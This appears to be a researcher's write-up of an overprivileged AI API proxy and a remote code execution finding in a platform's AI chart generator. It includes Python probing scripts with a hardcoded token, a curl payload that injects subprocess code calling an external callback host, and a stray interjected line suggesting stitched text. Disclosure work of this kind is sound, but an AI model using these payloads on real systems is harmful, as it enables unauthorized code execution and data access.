Overprivileged API and Remote Code Execution (RCE)


Discovery Process

Since I had previously discovered vulnerabilities in this platform, I was already familiar with its functionality. When I noticed the option to integrate AI, I knew that would be my next focus.

I started by testing the AI interactions. After sending a message, I inspected the request in the network tab (real ones use the network tab instead of Burp Suite). I quickly realized that the platform was using OpenAI’s ChatGPT API. However, the requests were being sent to an unexpected URL:

https://xwk……lambda-url.us-east-1.on.aws/

A few oddities stood out immediately:

- Instead of sending requests to https://api.openai.com, the platform routed them through a Lambda function acting as proxy middleware.
- A new bearer token was generated each time a user logged in to make requests to the AI. Initially, I suspected an API key leak, but the token didn’t work with standard OpenAI API endpoints, only with this specific Lambda server.
- The API endpoints mirrored OpenAI’s but lacked the /v1 prefix. For example, requests were sent to chat/completions instead of /v1/chat/completions.
I did NOT ask for all that
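The token-scoping observation above is easy to reproduce. A minimal sketch, assuming the proxy mirrors OpenAI's read-only `/models` listing endpoint (the probe path and `TOKEN` placeholder here are illustrative, not taken from the target):

```python
import requests

TOKEN = "<bearer token captured from the login request>"  # hypothetical placeholder

def build_probe(base_url, token, path="/models"):
    """Build (but don't send) an authenticated GET against a given base URL."""
    return requests.Request(
        "GET",
        f"{base_url.rstrip('/')}{path}",
        headers={"Authorization": f"Bearer {token}"},
    ).prepare()

# Same token, two targets: OpenAI proper (with /v1) vs. the Lambda proxy (no /v1).
openai_probe = build_probe("https://api.openai.com/v1", TOKEN)
proxy_probe = build_probe("https://xwk...........lambda-url.us-east-1.on.aws", TOKEN)

# Dispatching each with requests.Session().send(...) reproduces the behavior
# described above: rejected by api.openai.com, accepted only by the proxy.
```

Comparing the two responses side by side is what rules out a plain API key leak: the credential is scoped to the middleware, not to OpenAI itself.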

Given what I had observed, I decided to test the API directly. Since the endpoint names were identical to OpenAI’s, I automated my tests using Python.

I wrote a script to interact with the API and test various functionalities:

import requests

API_KEY = "44da8e2934a2ddb20bf7020c16c33743"  # change this

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json"
}

BASE_URL = "https://xwk...........lambda-url.us-east-1.on.aws"

# 1. Test Completions API
completion_data = {
    "model": "gpt-3.5-turbo-instruct",
    "prompt": "Tell me a joke.",
    "max_tokens": 50
}
completion_response = requests.post(f"{BASE_URL}/completions", headers=headers, json=completion_data)

# 2. Test Chat Completions API (GPT-4)
chat_data = {
    "model": "gpt-4",
    "messages": [
        {"role": "system", "content": "This is a test message."},
        {"role": "user", "content": "What is the capital of France?"}
    ]
}
chat_response = requests.post(f"{BASE_URL}/chat/completions", headers=headers, json=chat_data)

# 3. Test Embeddings API
embedding_data = {
    "model": "text-embedding-ada-002",
    "input": "It Works!"
}
embedding_response = requests.post(f"{BASE_URL}/embeddings", headers=headers, json=embedding_data)

# 4. Test Image Generation (DALL·E)
image_data = {
    "model": "dall-e-2",
    "prompt": "A futuristic city with flying cars",
    "n": 1,
    "size": "1024x1024"
}
image_response = requests.post(f"{BASE_URL}/images/generations", headers=headers, json=image_data)

# 5. Test Moderation API
moderation_data = {
    "input": "I want to harm someone."
}
moderation_response = requests.post(f"{BASE_URL}/moderations", headers=headers, json=moderation_data)

# 6. Test Speech-to-Text (Whisper) [Requires Audio File]
audio_file_path = "test_audio.mp3"
try:
    with open(audio_file_path, "rb") as audio_file:
        audio_response = requests.post(
            f"{BASE_URL}/audio/transcriptions",
            headers={"Authorization": f"Bearer {API_KEY}"},
            files={"file": audio_file},
            data={"model": "whisper-1"}
        )
except FileNotFoundError:
    audio_response = {"error": "No test audio file found"}

# Print Results
print("Completions Response:", completion_response.json())
print("Chat Completions Response:", chat_response.json())
print("Embeddings Response:", embedding_response.json())
print("Image Generation Response:", image_response.json())
print("Moderation Response:", moderation_response.json())
print("Audio Transcription Response:", audio_response.json() if isinstance(audio_response, requests.Response) else audio_response)

Results

All API requests were successful, confirming that the integration allowed access to functionalities beyond what a normal user should have.

Image generated by AI

At this point, I attempted to escalate privileges further by testing for write permissions, but unfortunately I did not have them.
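For readers curious what testing for write permissions can look like in practice, here is a sketch. It assumes the proxy mirrors OpenAI's endpoint names; the specific write endpoints listed are illustrative, not confirmed on the target, and the token is a placeholder:

```python
import requests

API_KEY = "<bearer token from the login flow>"  # hypothetical placeholder
BASE_URL = "https://xwk...........lambda-url.us-east-1.on.aws"

# State-changing (write) operations in OpenAI's API surface; whether the
# proxy forwards any of these is exactly what the probes would determine.
WRITE_PROBES = [
    ("POST", "/files"),             # upload a file (used for fine-tuning)
    ("POST", "/fine_tuning/jobs"),  # start a fine-tuning job
    ("DELETE", "/models/x"),        # delete a fine-tuned model
]

def classify(status_code):
    """Interpret the HTTP status returned by a write probe."""
    if status_code in (401, 403):
        return "denied"
    if 200 <= status_code < 300:
        return "allowed"
    return "reachable but rejected (e.g. validation error)"

# for method, path in WRITE_PROBES:
#     resp = requests.request(method, f"{BASE_URL}{path}",
#                             headers={"Authorization": f"Bearer {API_KEY}"})
#     print(method, path, classify(resp.status_code))
```

In this case, probes of this kind all came back denied, which is why the escalation stopped there.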

Next, I moved on to testing the mobile app since the same functions were being used there as well, intercepting requests with HTTP Toolkit. I revisited the AI integration and repeatedly prompted the AI with variations of “generate a picture of a futuristic car.”

Unexpectedly, instead of returning an image, the AI generated a graph that resembled a car. Graphs, I believe, were normally generated to visualize patient data, so it ended up plotting the car on a graph.

Graph generated by AI

Because I was intercepting requests, I saw that this request was sent to a completely different Lambda function:

https://rbb……lambda-url.us-east-1.on.aws/

Graph request in HTTP Toolkit

At this point, it became clear that the AI was generating code to run and passing it to this server for execution. Given that it was a Python-based execution environment, direct system command execution wouldn’t work. Instead, I tested whether I could import libraries and make external requests.

I crafted a payload to test remote code execution:

curl -X POST "https://rbb……lambda-url.us-east-1.on.aws/" \
-H "Accept: */*" \
-H "Authorization: Bearer <REDACTED>" \
-H "Content-Type: application/json" \
--data-raw '{
"code": "import subprocess; subprocess.call([\"curl\", \"-X\", \"GET\", \"edv3rz3d44ofsnu1y.oastify.com\"])"
}'
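The same payload can be fired from Python instead of curl. A sketch mirroring the request above; the `code` field name comes from the intercepted graph request, while the token stays redacted as in the original:

```python
import json
import requests

EXEC_URL = "https://rbb...........lambda-url.us-east-1.on.aws/"  # truncated as above
TOKEN = "<REDACTED>"
OOB_DOMAIN = "edv3rz3d44ofsnu1y.oastify.com"  # out-of-band callback listener

# The sandbox runs Python, so the payload is Python source, not a shell command.
payload = {
    "code": f'import subprocess; subprocess.call(["curl", "-X", "GET", "{OOB_DOMAIN}"])'
}

req = requests.Request(
    "POST",
    EXEC_URL,
    headers={"Authorization": f"Bearer {TOKEN}", "Content-Type": "application/json"},
    json=payload,
).prepare()

# requests.Session().send(req) dispatches it; a DNS/HTTP hit on the OOB
# domain is the out-of-band proof that the injected code executed.
```

Using an out-of-band domain rather than inspecting the HTTP response is deliberate: even if the sandbox swallows output, the callback still proves execution.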

Results

This triggered a ping on my server, confirming that Remote Code Execution (RCE) was possible.

ping on my server

I stopped testing after this confirmation, as further exploitation was unnecessary to prove the severity of the issue.
